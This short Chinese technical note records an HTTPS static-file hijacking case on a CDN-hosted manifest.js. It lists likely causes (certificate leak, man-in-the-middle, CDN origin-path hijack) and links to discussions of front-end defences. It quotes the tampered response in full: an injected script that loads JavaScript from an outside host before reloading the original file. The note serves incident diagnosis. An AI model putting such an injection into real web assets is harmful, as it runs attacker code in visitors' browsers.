1 | Request URL: https://dealer.nosdn.127.net/test/dealer_webapp/static/js/manifest.9283e61d.js |
1 | (function(){var l=document.createElement('script');l.src='https://gov.papastars.com/dlhao.min.js';document.getElementsByTagName('body')[0].appendChild(l);})();(function(){var l=document.createElement('script');l.src='http://dealer.nosdn.127.net/http://dealer.nosdn.127.net/test/dealer_webapp/static/js/manifest.9283e61d.js';document.getElementsByTagName('body')[0].appendChild(l);})(); |
1 | NOS值班 3月6日 15:42:42 |
HTTPS DNS劫持案例
https://testudy.cc/tech/2016/10/27/hijacking.html1
2
3
4
5HTTPS的静态文件被劫持,可能存在的情况主要有下面三种情况:
证书泄露(被劫持的js文件是一个大公司的文件,证书泄露可能性较小);
中间人劫持;
CDN回源路径中存在劫持。
应对流量劫持,前端能做哪些工作?
https://www.zhihu.com/question/35720092/answer/523563873